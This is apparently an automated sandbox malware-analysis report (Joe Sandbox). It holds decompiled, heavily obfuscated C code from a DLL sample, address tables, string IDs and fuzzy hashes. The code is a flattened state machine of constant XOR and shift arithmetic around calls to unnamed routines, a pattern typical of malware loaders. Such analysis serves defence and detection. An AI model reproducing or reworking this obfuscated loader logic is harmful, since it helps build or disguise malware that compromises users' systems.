                                                                                                                                                                                      				_v288 = _v288 ^ 0x0050b8a2;
                                                                                                                                                                                      				_v304 = 0x566331;
                                                                                                                                                                                      				_t916 = 0x8e3f5ae;
                                                                                                                                                                                      				_v304 = _v304 >> 4;
                                                                                                                                                                                      				_t913 = 0xf1618c3;
                                                                                                                                                                                      				_v304 = _v304 >> 9;
                                                                                                                                                                                      				_v304 = _v304 >> 5;
                                                                                                                                                                                      				_v304 = _v304 ^ 0x000acbce;
                                                                                                                                                                                      				_v72 = 0x20;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					_t829 = 0xfce4db5;
                                                                                                                                                                                      					_t761 = 0x8c7d07e;
                                                                                                                                                                                      					_t889 = 0x74c5c61;
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							L2:
                                                                                                                                                                                      							_t925 = _t808 - _t916;
                                                                                                                                                                                      							if(_t925 <= 0) {
                                                                                                                                                                                      								break;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t808 - _t913;
                                                                                                                                                                                      							if(_t808 == _t913) {
                                                                                                                                                                                      								E003D2CF9(_v116, _v288, _v296, _v304, _v84);
                                                                                                                                                                                      								_t923 =  &(_t923[3]);
                                                                                                                                                                                      								_t808 = 0x3abff5b;
                                                                                                                                                                                      								goto L24;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eflags = _t808 - 0xf774147;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									_t808 = 0x77e61bb;
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									__eflags = _t808 - _t829;
                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                      										_push(0x3d1648);
                                                                                                                                                                                      										_t917 = E003F0AD3(_v352, _v172, __eflags);
                                                                                                                                                                                      										 *_t923 = 0x3d1678;
                                                                                                                                                                                      										_t795 = E003F0AD3(_v252, _v164, __eflags);
                                                                                                                                                                                      										_v64 = _v344;
                                                                                                                                                                                      										_t797 = E003DF14F(_v336, _t917, _v148, _v156);
                                                                                                                                                                                      										_v56 = _v56 & 0x00000000;
                                                                                                                                                                                      										_v60 = _t917;
                                                                                                                                                                                      										_v52 = 1;
                                                                                                                                                                                      										_v68 = 2 + _t797 * 2;
                                                                                                                                                                                      										_v48 =  &_v68;
                                                                                                                                                                                      										_v80 = _v72;
                                                                                                                                                                                      										__eflags = E003D386E(_v328,  &_v80, _v220, _v228, _v236,  &_v32, _v132,  &_v56, _v76, _v140, _v244, _v72, _t795) - _v212;
                                                                                                                                                                                      										_t808 =  ==  ? 0x74c5c61 : 0xf1618c3;
                                                                                                                                                                                      										E003E2EED(_v124, _v196, _v204, _t917);
                                                                                                                                                                                      										_t923 =  &(_t923[0x10]);
                                                                                                                                                                                      										E003E2EED(_v188, _v312, _v320, _t795);
                                                                                                                                                                                      										L11:
                                                                                                                                                                                      										_t913 = 0xf1618c3;
                                                                                                                                                                                      										L12:
                                                                                                                                                                                      										_t916 = 0x8e3f5ae;
                                                                                                                                                                                      										L24:
                                                                                                                                                                                      										_t761 = 0x8c7d07e;
                                                                                                                                                                                      										_t829 = 0xfce4db5;
                                                                                                                                                                                      										_t889 = 0x74c5c61;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t925 == 0) {
                                                                                                                                                                                      							_t763 = E003F0AD3(_v316, _v108, __eflags);
                                                                                                                                                                                      							_t832 = 0x3d1708;
                                                                                                                                                                                      							_t918 = _t763;
                                                                                                                                                                                      							_v44 = _v200;
                                                                                                                                                                                      							_v40 = _v340;
                                                                                                                                                                                      							_v36 = _v392;
                                                                                                                                                                                      							_t772 = E003EC50B(_v376, _v84,  *((intOrPtr*)( *0x3f5be0 + 0xc)), _t832, _v120, _v104,  *0x3f5be0 + 0x70, _t832, _v128,  &_v44,  *((intOrPtr*)( *0x3f5be0 + 8)), _v384, _t763, _v284, _v276, _v280);
                                                                                                                                                                                      							_t923 =  &(_t923[0xe]);
                                                                                                                                                                                      							__eflags = _t772 - _v260;
                                                                                                                                                                                      							if(_t772 != _v260) {
                                                                                                                                                                                      								_t808 = 0x88fbe98;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t808 = _t913;
                                                                                                                                                                                      								_t921 = 1;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E003E2EED(_v360, _v180, _v368, _t918);
                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							if(_t808 == _t889) {
                                                                                                                                                                                      								_push(0x3d1618);
                                                                                                                                                                                      								__eflags = E003D5894(_v144,  *0x3f5be0 + 0xc, _v356,  &_v80, _v324, _v240, E003F0AD3(_v364, _v92, __eflags), _v216, _v248, _v84) - _v100;
                                                                                                                                                                                      								_t808 =  ==  ? 0x8c7d07e : _t913;
                                                                                                                                                                                      								E003E2EED(_v136, _v348, _v292, _t774);
                                                                                                                                                                                      								_t923 =  &(_t923[0xb]);
                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								if(_t808 == 0x77e61bb) {
                                                                                                                                                                                      									_push(0x3d1738);
                                                                                                                                                                                      									_t780 = E003F0AD3(_v380, _v232, __eflags);
                                                                                                                                                                                      									 *_t923 = 0x3d15c8;
                                                                                                                                                                                      									__eflags = E003D92DD(_t780, _v208, _v88,  &_v84, E003F0AD3(_v184, _v272, __eflags), _v160, _v332, _v112) - _v264;
                                                                                                                                                                                      									_t808 =  ==  ? 0xfce4db5 : 0x3abff5b;
                                                                                                                                                                                      									E003E2EED(_v152, _v224, _v372, _t780);
                                                                                                                                                                                      									E003E2EED(_v192, _v256, _v308, _t781);
                                                                                                                                                                                      									_t923 =  &(_t923[0xb]);
                                                                                                                                                                                      									goto L11;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									if(_t808 == 0x88fbe98) {
                                                                                                                                                                                      										E003DF699(_v300,  *((intOrPtr*)( *0x3f5be0 + 8)), _v268, _v96, _v176);
                                                                                                                                                                                      										_t923 =  &(_t923[3]);
                                                                                                                                                                                      										_t808 = _t913;
                                                                                                                                                                                      										goto L1;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										if(_t808 == _t761) {
                                                                                                                                                                                      											_push(_t829);
                                                                                                                                                                                      											_t792 = E003E6F53( *((intOrPtr*)( *0x3f5be0 + 0xc)));
                                                                                                                                                                                      											_t808 =  !=  ? _t916 : _t913;
                                                                                                                                                                                      											 *((intOrPtr*)( *0x3f5be0 + 8)) = _t792;
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												L1:
                                                                                                                                                                                      												_t829 = 0xfce4db5;
                                                                                                                                                                                      												_t761 = 0x8c7d07e;
                                                                                                                                                                                      												_t889 = 0x74c5c61;
                                                                                                                                                                                      												goto L2;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L25:
                                                                                                                                                                                      						__eflags = _t808 - 0x3abff5b;
                                                                                                                                                                                      					} while (__eflags != 0);
                                                                                                                                                                                      					return _t921;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}






























































































































                                                                                                                                                                                      0x003ef561
                                                                                                                                                                                      0x003ef567
                                                                                                                                                                                      0x003ef580
                                                                                                                                                                                      0x003ef587
                                                                                                                                                                                      0x003ef589
                                                                                                                                                                                      0x003ef594
                                                                                                                                                                                      0x003ef599
                                                                                                                                                                                      0x003ef5a4
                                                                                                                                                                                      0x003ef5ac
                                                                                                                                                                                      0x003ef5b1
                                                                                                                                                                                      0x003ef5bf
                                                                                                                                                                                      0x003ef5c6
                                                                                                                                                                                      0x003ef5cb
                                                                                                                                                                                      0x003ef5d1
                                                                                                                                                                                      0x003ef5d9
                                                                                                                                                                                      0x003ef5e1
                                                                                                                                                                                      0x003ef5e6
                                                                                                                                                                                      0x003ef5ee
                                                                                                                                                                                      0x003ef5f3
                                                                                                                                                                                      0x003ef5fb
                                                                                                                                                                                      0x003ef60e
                                                                                                                                                                                      0x003ef611
                                                                                                                                                                                      0x003ef623
                                                                                                                                                                                      0x003ef62a
                                                                                                                                                                                      0x003ef635
                                                                                                                                                                                      0x003ef640
                                                                                                                                                                                      0x003ef64f
                                                                                                                                                                                      0x003ef654
                                                                                                                                                                                      0x003ef65d
                                                                                                                                                                                      0x003ef668
                                                                                                                                                                                      0x003ef673
                                                                                                                                                                                      0x003ef67b
                                                                                                                                                                                      0x003ef683
                                                                                                                                                                                      0x003ef68e
                                                                                                                                                                                      0x003ef6a1
                                                                                                                                                                                      0x003ef6a2
                                                                                                                                                                                      0x003ef6a9
                                                                                                                                                                                      0x003ef6b4
                                                                                                                                                                                      0x003ef6bf
                                                                                                                                                                                      0x003ef6ca
                                                                                                                                                                                      0x003ef6d2
                                                                                                                                                                                      0x003ef6da
                                                                                                                                                                                      0x003ef6e5
                                                                                                                                                                                      0x003ef6f0
                                                                                                                                                                                      0x003ef6fb
                                                                                                                                                                                      0x003ef706
                                                                                                                                                                                      0x003ef711
                                                                                                                                                                                      0x003ef71c
                                                                                                                                                                                      0x003ef727
                                                                                                                                                                                      0x003ef732
                                                                                                                                                                                      0x003ef73d
                                                                                                                                                                                      0x003ef748
                                                                                                                                                                                      0x003ef753
                                                                                                                                                                                      0x003ef75b
                                                                                                                                                                                      0x003ef763
                                                                                                                                                                                      0x003ef768
                                                                                                                                                                                      0x003ef76d
                                                                                                                                                                                      0x003ef775
                                                                                                                                                                                      0x003ef783
                                                                                                                                                                                      0x003ef787
                                                                                                                                                                                      0x003ef791
                                                                                                                                                                                      0x003ef799
                                                                                                                                                                                      0x003ef7a1
                                                                                                                                                                                      0x003ef7a9
                                                                                                                                                                                      0x003ef7b1
                                                                                                                                                                                      0x003ef7bc
                                                                                                                                                                                      0x003ef7c1
                                                                                                                                                                                      0x003ef7c7
                                                                                                                                                                                      0x003ef7cf
                                                                                                                                                                                      0x003ef7da
                                                                                                                                                                                      0x003ef7e9
                                                                                                                                                                                      0x003ef7ee
                                                                                                                                                                                      0x003ef7f7
                                                                                                                                                                                      0x003ef802
                                                                                                                                                                                      0x003ef80d
                                                                                                                                                                                      0x003ef814
                                                                                                                                                                                      0x003ef81f
                                                                                                                                                                                      0x003ef82a
                                                                                                                                                                                      0x003ef832
                                                                                                                                                                                      0x003ef83a
                                                                                                                                                                                      0x003ef845
                                                                                                                                                                                      0x003ef850
                                                                                                                                                                                      0x003ef85b
                                                                                                                                                                                      0x003ef866
                                                                                                                                                                                      0x003ef871
                                                                                                                                                                                      0x003ef878
                                                                                                                                                                                      0x003ef883
                                                                                                                                                                                      0x003ef88b
                                                                                                                                                                                      0x003ef893
                                                                                                                                                                                      0x003ef89d
                                                                                                                                                                                      0x003ef89e
                                                                                                                                                                                      0x003ef8a2
                                                                                                                                                                                      0x003ef8aa
                                                                                                                                                                                      0x003ef8b5
                                                                                                                                                                                      0x003ef8c0
                                                                                                                                                                                      0x003ef8cb
                                                                                                                                                                                      0x003ef8d6
                                                                                                                                                                                      0x003ef8e1
                                                                                                                                                                                      0x003ef8ec
                                                                                                                                                                                      0x003ef8f7
                                                                                                                                                                                      0x003ef907
                                                                                                                                                                                      0x003ef90e
                                                                                                                                                                                      0x003ef919
                                                                                                                                                                                      0x003ef927
                                                                                                                                                                                      0x003ef930
                                                                                                                                                                                      0x003ef934
                                                                                                                                                                                      0x003ef93c
                                                                                                                                                                                      0x003ef944
                                                                                                                                                                                      0x003ef94f
                                                                                                                                                                                      0x003ef95a
                                                                                                                                                                                      0x003ef962
                                                                                                                                                                                      0x003ef96d
                                                                                                                                                                                      0x003ef978
                                                                                                                                                                                      0x003ef980
                                                                                                                                                                                      0x003ef98b
                                                                                                                                                                                      0x003ef996
                                                                                                                                                                                      0x003ef99e
                                                                                                                                                                                      0x003ef9a6
                                                                                                                                                                                      0x003ef9ab
                                                                                                                                                                                      0x003ef9b3
                                                                                                                                                                                      0x003ef9bb
                                                                                                                                                                                      0x003ef9c3
                                                                                                                                                                                      0x003ef9c8
                                                                                                                                                                                      0x003ef9d0
                                                                                                                                                                                      0x003ef9d8
                                                                                                                                                                                      0x003ef9e0
                                                                                                                                                                                      0x003ef9ed
                                                                                                                                                                                      0x003ef9f8
                                                                                                                                                                                      0x003efa03
                                                                                                                                                                                      0x003efa18
                                                                                                                                                                                      0x003efa1b
                                                                                                                                                                                      0x003efa22
                                                                                                                                                                                      0x003efa2a
                                                                                                                                                                                      0x003efa35
                                                                                                                                                                                      0x003efa48
                                                                                                                                                                                      0x003efa4f
                                                                                                                                                                                      0x003efa5a
                                                                                                                                                                                      0x003efa62
                                                                                                                                                                                      0x003efa67
                                                                                                                                                                                      0x003efa6f
                                                                                                                                                                                      0x003efa77
                                                                                                                                                                                      0x003efa7f
                                                                                                                                                                                      0x003efa8a
                                                                                                                                                                                      0x003efa95
                                                                                                                                                                                      0x003efaa0
                                                                                                                                                                                      0x003efab3
                                                                                                                                                                                      0x003efaba
                                                                                                                                                                                      0x003efac5
                                                                                                                                                                                      0x003efacd
                                                                                                                                                                                      0x003efad5
                                                                                                                                                                                      0x003efadd
                                                                                                                                                                                      0x003efae5
                                                                                                                                                                                      0x003efafb
                                                                                                                                                                                      0x003efb02
                                                                                                                                                                                      0x003efb0d
                                                                                                                                                                                      0x003efb18
                                                                                                                                                                                      0x003efb23
                                                                                                                                                                                      0x003efb2b
                                                                                                                                                                                      0x003efb36
                                                                                                                                                                                      0x003efb41
                                                                                                                                                                                      0x003efb53
                                                                                                                                                                                      0x003efb58
                                                                                                                                                                                      0x003efb61
                                                                                                                                                                                      0x003efb6c
                                                                                                                                                                                      0x003efb77
                                                                                                                                                                                      0x003efb7f
                                                                                                                                                                                      0x003efb8a
                                                                                                                                                                                      0x003efb95
                                                                                                                                                                                      0x003efb9d
                                                                                                                                                                                      0x003efba8
                                                                                                                                                                                      0x003efbb3
                                                                                                                                                                                      0x003efbbe
                                                                                                                                                                                      0x003efbc6
                                                                                                                                                                                      0x003efbd1
                                                                                                                                                                                      0x003efbdc
                                                                                                                                                                                      0x003efbe4
                                                                                                                                                                                      0x003efbef
                                                                                                                                                                                      0x003efbfa
                                                                                                                                                                                      0x003efc05
                                                                                                                                                                                      0x003efc10
                                                                                                                                                                                      0x003efc1b
                                                                                                                                                                                      0x003efc26
                                                                                                                                                                                      0x003efc31
                                                                                                                                                                                      0x003efc39
                                                                                                                                                                                      0x003efc41
                                                                                                                                                                                      0x003efc4c
                                                                                                                                                                                      0x003efc58
                                                                                                                                                                                      0x003efc5b
                                                                                                                                                                                      0x003efc5f
                                                                                                                                                                                      0x003efc64
                                                                                                                                                                                      0x003efc6c
                                                                                                                                                                                      0x003efc74
                                                                                                                                                                                      0x003efc85
                                                                                                                                                                                      0x003efc88
                                                                                                                                                                                      0x003efc91
                                                                                                                                                                                      0x003efc9d
                                                                                                                                                                                      0x003efca1
                                                                                                                                                                                      0x003efca9
                                                                                                                                                                                      0x003efcb1
                                                                                                                                                                                      0x003efcb9
                                                                                                                                                                                      0x003efcbe
                                                                                                                                                                                      0x003efcc6
                                                                                                                                                                                      0x003efcce
                                                                                                                                                                                      0x003efcd9
                                                                                                                                                                                      0x003efce4
                                                                                                                                                                                      0x003efcef
                                                                                                                                                                                      0x003efcfa
                                                                                                                                                                                      0x003efd05
                                                                                                                                                                                      0x003efd10
                                                                                                                                                                                      0x003efd18
                                                                                                                                                                                      0x003efd1d
                                                                                                                                                                                      0x003efd2a
                                                                                                                                                                                      0x003efd2b
                                                                                                                                                                                      0x003efd2f
                                                                                                                                                                                      0x003efd37
                                                                                                                                                                                      0x003efd3f
                                                                                                                                                                                      0x003efd44
                                                                                                                                                                                      0x003efd4c
                                                                                                                                                                                      0x003efd54
                                                                                                                                                                                      0x003efd5c
                                                                                                                                                                                      0x003efd67
                                                                                                                                                                                      0x003efd72
                                                                                                                                                                                      0x003efd7d
                                                                                                                                                                                      0x003efd88
                                                                                                                                                                                      0x003efd9c
                                                                                                                                                                                      0x003efda3
                                                                                                                                                                                      0x003efdae
                                                                                                                                                                                      0x003efdb9
                                                                                                                                                                                      0x003efdc4
                                                                                                                                                                                      0x003efdcf
                                                                                                                                                                                      0x003efdda
                                                                                                                                                                                      0x003efde2
                                                                                                                                                                                      0x003efdea
                                                                                                                                                                                      0x003efdf7
                                                                                                                                                                                      0x003efdfb
                                                                                                                                                                                      0x003efe03
                                                                                                                                                                                      0x003efe0b
                                                                                                                                                                                      0x003efe13
                                                                                                                                                                                      0x003efe1b
                                                                                                                                                                                      0x003efe23
                                                                                                                                                                                      0x003efe2b
                                                                                                                                                                                      0x003efe33
                                                                                                                                                                                      0x003efe3b
                                                                                                                                                                                      0x003efe3f
                                                                                                                                                                                      0x003efe47
                                                                                                                                                                                      0x003efe4f
                                                                                                                                                                                      0x003efe5a
                                                                                                                                                                                      0x003efe62
                                                                                                                                                                                      0x003efe6d
                                                                                                                                                                                      0x003efe7a
                                                                                                                                                                                      0x003efe7e
                                                                                                                                                                                      0x003efe86
                                                                                                                                                                                      0x003efe8e
                                                                                                                                                                                      0x003efe96
                                                                                                                                                                                      0x003efea1
                                                                                                                                                                                      0x003efea9
                                                                                                                                                                                      0x003efeb4
                                                                                                                                                                                      0x003efebc
                                                                                                                                                                                      0x003efec9
                                                                                                                                                                                      0x003efecf
                                                                                                                                                                                      0x003efed4
                                                                                                                                                                                      0x003efedc
                                                                                                                                                                                      0x003efef0
                                                                                                                                                                                      0x003efef5
                                                                                                                                                                                      0x003efefe
                                                                                                                                                                                      0x003eff09
                                                                                                                                                                                      0x003eff14
                                                                                                                                                                                      0x003eff1f
                                                                                                                                                                                      0x003eff2a
                                                                                                                                                                                      0x003eff32
                                                                                                                                                                                      0x003eff3a
                                                                                                                                                                                      0x003eff44
                                                                                                                                                                                      0x003eff47
                                                                                                                                                                                      0x003eff4b
                                                                                                                                                                                      0x003eff53
                                                                                                                                                                                      0x003eff5e
                                                                                                                                                                                      0x003eff69
                                                                                                                                                                                      0x003eff71
                                                                                                                                                                                      0x003eff7c
                                                                                                                                                                                      0x003eff87
                                                                                                                                                                                      0x003eff92
                                                                                                                                                                                      0x003eff9d
                                                                                                                                                                                      0x003effa8
                                                                                                                                                                                      0x003effb3
                                                                                                                                                                                      0x003effbe
                                                                                                                                                                                      0x003effc9
                                                                                                                                                                                      0x003effd4
                                                                                                                                                                                      0x003effdc
                                                                                                                                                                                      0x003effe1
                                                                                                                                                                                      0x003effee
                                                                                                                                                                                      0x003efff2
                                                                                                                                                                                      0x003efffa
                                                                                                                                                                                      0x003f000d
                                                                                                                                                                                      0x003f000e
                                                                                                                                                                                      0x003f0015
                                                                                                                                                                                      0x003f0020
                                                                                                                                                                                      0x003f0028
                                                                                                                                                                                      0x003f0035
                                                                                                                                                                                      0x003f003e
                                                                                                                                                                                      0x003f0042
                                                                                                                                                                                      0x003f004a
                                                                                                                                                                                      0x003f0052
                                                                                                                                                                                      0x003f005a
                                                                                                                                                                                      0x003f0062
                                                                                                                                                                                      0x003f006a
                                                                                                                                                                                      0x003f0072
                                                                                                                                                                                      0x003f007d
                                                                                                                                                                                      0x003f0085
                                                                                                                                                                                      0x003f0090
                                                                                                                                                                                      0x003f009b
                                                                                                                                                                                      0x003f00a6
                                                                                                                                                                                      0x003f00ae
                                                                                                                                                                                      0x003f00b9
                                                                                                                                                                                      0x003f00cd
                                                                                                                                                                                      0x003f00d4
                                                                                                                                                                                      0x003f00df
                                                                                                                                                                                      0x003f00ea
                                                                                                                                                                                      0x003f00f5
                                                                                                                                                                                      0x003f0100
                                                                                                                                                                                      0x003f0108
                                                                                                                                                                                      0x003f010c
                                                                                                                                                                                      0x003f0114
                                                                                                                                                                                      0x003f0119
                                                                                                                                                                                      0x003f0121
                                                                                                                                                                                      0x003f0129
                                                                                                                                                                                      0x003f012e
                                                                                                                                                                                      0x003f0133
                                                                                                                                                                                      0x003f0138
                                                                                                                                                                                      0x003f013d
                                                                                                                                                                                      0x003f0142
                                                                                                                                                                                      0x003f014a
                                                                                                                                                                                      0x003f0155
                                                                                                                                                                                      0x003f0155
                                                                                                                                                                                      0x003f0155
                                                                                                                                                                                      0x003f015a
                                                                                                                                                                                      0x003f015f
                                                                                                                                                                                      0x003f0164
                                                                                                                                                                                      0x003f0164
                                                                                                                                                                                      0x003f0164
                                                                                                                                                                                      0x003f0164
                                                                                                                                                                                      0x003f0166
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003f0411
                                                                                                                                                                                      0x003f0413
                                                                                                                                                                                      0x003f0597
                                                                                                                                                                                      0x003f059c
                                                                                                                                                                                      0x003f059f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003f0419
                                                                                                                                                                                      0x003f0419
                                                                                                                                                                                      0x003f041f
                                                                                                                                                                                      0x003f0570
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003f0425
                                                                                                                                                                                      0x003f0425
                                                                                                                                                                                      0x003f0427
                                                                                                                                                                                      0x003f0438
                                                                                                                                                                                      0x003f0449
                                                                                                                                                                                      0x003f0452
                                                                                                                                                                                      0x003f0459
                                                                                                                                                                                      0x003f046d
                                                                                                                                                                                      0x003f047f
                                                                                                                                                                                      0x003f0485
                                                                                                                                                                                      0x003f0494
                                                                                                                                                                                      0x003f04a2
                                                                                                                                                                                      0x003f04ad
                                                                                                                                                                                      0x003f04bb
                                                                                                                                                                                      0x003f04d1
                                                                                                                                                                                      0x003f052c
                                                                                                                                                                                      0x003f0549
                                                                                                                                                                                      0x003f054c
                                                                                                                                                                                      0x003f0551
                                                                                                                                                                                      0x003f0564
                                                                                                                                                                                      0x003f02a2
                                                                                                                                                                                      0x003f02a2
                                                                                                                                                                                      0x003f02a7
                                                                                                                                                                                      0x003f02a7
                                                                                                                                                                                      0x003f05a4
                                                                                                                                                                                      0x003f05a4
                                                                                                                                                                                      0x003f05a9
                                                                                                                                                                                      0x003f05ae
                                                                                                                                                                                      0x003f05ae
                                                                                                                                                                                      0x003f0427
                                                                                                                                                                                      0x003f041f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003f0413
                                                                                                                                                                                      0x003f016c
                                                                                                                                                                                      0x003f034f
                                                                                                                                                                                      0x003f0354
                                                                                                                                                                                      0x003f0355
                                                                                                                                                                                      0x003f035e
                                                                                                                                                                                      0x003f0369
                                                                                                                                                                                      0x003f037b
                                                                                                                                                                                      0x003f03d8
                                                                                                                                                                                      0x003f03dd
                                                                                                                                                                                      0x003f03e0
                                                                                                                                                                                      0x003f03e7
                                                                                                                                                                                      0x003f03f0
                                                                                                                                                                                      0x003f03e9
                                                                                                                                                                                      0x003f03eb
                                                                                                                                                                                      0x003f03ed
                                                                                                                                                                                      0x003f03ed
                                                                                                                                                                                      0x003f0405
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003f0172
                                                                                                                                                                                      0x003f0174
                                                                                                                                                                                      0x003f02bc
                                                                                                                                                                                      0x003f0315
                                                                                                                                                                                      0x003f032f
                                                                                                                                                                                      0x003f0332
                                                                                                                                                                                      0x003f0337
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003f017a
                                                                                                                                                                                      0x003f0180
                                                                                                                                                                                      0x003f01fc
                                                                                                                                                                                      0x003f0201
                                                                                                                                                                                      0x003f0216
                                                                                                                                                                                      0x003f0262
                                                                                                                                                                                      0x003f027c
                                                                                                                                                                                      0x003f027f
                                                                                                                                                                                      0x003f029a
                                                                                                                                                                                      0x003f029f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003f0182
                                                                                                                                                                                      0x003f0188
                                                                                                                                                                                      0x003f01e2
                                                                                                                                                                                      0x003f01e7
                                                                                                                                                                                      0x003f01ea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003f018a
                                                                                                                                                                                      0x003f018c
                                                                                                                                                                                      0x003f01a3
                                                                                                                                                                                      0x003f01a7
                                                                                                                                                                                      0x003f01b8
                                                                                                                                                                                      0x003f01bb
                                                                                                                                                                                      0x003f0155
                                                                                                                                                                                      0x003f0155
                                                                                                                                                                                      0x003f0155
                                                                                                                                                                                      0x003f015a
                                                                                                                                                                                      0x003f015f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003f015f
                                                                                                                                                                                      0x003f0155
                                                                                                                                                                                      0x003f018c
                                                                                                                                                                                      0x003f0188
                                                                                                                                                                                      0x003f0180
                                                                                                                                                                                      0x003f0174
                                                                                                                                                                                      0x003f05b3
                                                                                                                                                                                      0x003f05b3
                                                                                                                                                                                      0x003f05b3
                                                                                                                                                                                      0x003f05cb
                                                                                                                                                                                      0x003f05cb

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: $($*h$,Tj$1cV$4T$;r$@H$CM<$J-$M49$Nu$R$TqV$qDC$yI$~A
                                                                                                                                                                                      • API String ID: 0-1702946932
                                                                                                                                                                                      • Opcode ID: f6f89c221d63cd16781329bd244c580a4b275790a4a1912149d8e73b6f7f35d7
                                                                                                                                                                                      • Instruction ID: 0bf4a99e5a85a5ae87aacb7da1c90b8101453cc0accce458b2406835364216a6
                                                                                                                                                                                      • Opcode Fuzzy Hash: f6f89c221d63cd16781329bd244c580a4b275790a4a1912149d8e73b6f7f35d7
                                                                                                                                                                                      • Instruction Fuzzy Hash: E282F0715093809FD3B9CF65C58AB9BBBE1BBC4704F10891DE1DA8A260DBB58949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                      			E003DC69B(intOrPtr* __ecx) {
                                                                                                                                                                                      				char _v68;
                                                                                                                                                                                      				char _v76;
                                                                                                                                                                                      				void* _v88;
                                                                                                                                                                                      				intOrPtr _v92;
                                                                                                                                                                                      				intOrPtr* _v96;
                                                                                                                                                                                      				char _v100;
                                                                                                                                                                                      				char _v104;
                                                                                                                                                                                      				char _v108;
                                                                                                                                                                                      				char _v112;
                                                                                                                                                                                      				char _v116;
                                                                                                                                                                                      				signed int _v120;
                                                                                                                                                                                      				signed int _v124;
                                                                                                                                                                                      				signed int _v128;
                                                                                                                                                                                      				signed int _v132;
                                                                                                                                                                                      				signed int _v136;
                                                                                                                                                                                      				signed int _v140;
                                                                                                                                                                                      				signed int _v144;
                                                                                                                                                                                      				signed int _v148;
                                                                                                                                                                                      				signed int _v152;
                                                                                                                                                                                      				signed int _v156;
                                                                                                                                                                                      				signed int _v160;
                                                                                                                                                                                      				signed int _v164;
                                                                                                                                                                                      				signed int _v168;
                                                                                                                                                                                      				signed int _v172;
                                                                                                                                                                                      				signed int _v176;
                                                                                                                                                                                      				signed int _v180;
                                                                                                                                                                                      				signed int _v184;
                                                                                                                                                                                      				signed int _v188;
                                                                                                                                                                                      				signed int _v192;
                                                                                                                                                                                      				signed int _v196;
                                                                                                                                                                                      				signed int _v200;
                                                                                                                                                                                      				signed int _v204;
                                                                                                                                                                                      				signed int _v208;
                                                                                                                                                                                      				signed int _v212;
                                                                                                                                                                                      				signed int _v216;
                                                                                                                                                                                      				signed int _v220;
                                                                                                                                                                                      				signed int _v224;
                                                                                                                                                                                      				signed int _v228;
                                                                                                                                                                                      				signed int _v232;
                                                                                                                                                                                      				signed int _v236;
                                                                                                                                                                                      				signed int _v240;
                                                                                                                                                                                      				signed int _v244;
                                                                                                                                                                                      				signed int _v248;
                                                                                                                                                                                      				signed int _v252;
                                                                                                                                                                                      				signed int _v256;
                                                                                                                                                                                      				signed int _v260;
                                                                                                                                                                                      				signed int _v264;
                                                                                                                                                                                      				signed int _v268;
                                                                                                                                                                                      				signed int _v272;
                                                                                                                                                                                      				signed int _v276;
                                                                                                                                                                                      				signed int _v280;
                                                                                                                                                                                      				signed int _v284;
                                                                                                                                                                                      				signed int _v288;
                                                                                                                                                                                      				signed int _v292;
                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                      				signed int _v300;
                                                                                                                                                                                      				signed int _v304;
                                                                                                                                                                                      				signed int _v308;
                                                                                                                                                                                      				signed int _v312;
                                                                                                                                                                                      				signed int _v316;
                                                                                                                                                                                      				signed int _v320;
                                                                                                                                                                                      				signed int _v324;
                                                                                                                                                                                      				signed int _v328;
                                                                                                                                                                                      				signed int _v332;
                                                                                                                                                                                      				signed int _v336;
                                                                                                                                                                                      				signed int _v340;
                                                                                                                                                                                      				signed int _v344;
                                                                                                                                                                                      				signed int _v348;
                                                                                                                                                                                      				signed int _v352;
                                                                                                                                                                                      				signed int _v356;
                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                      				signed int _v364;
                                                                                                                                                                                      				signed int _v368;
                                                                                                                                                                                      				signed int _v372;
                                                                                                                                                                                      				signed int _v376;
                                                                                                                                                                                      				signed int _v380;
                                                                                                                                                                                      				signed int _v384;
                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                      				signed int _v392;
                                                                                                                                                                                      				signed int _v396;
                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                      				signed int _v404;
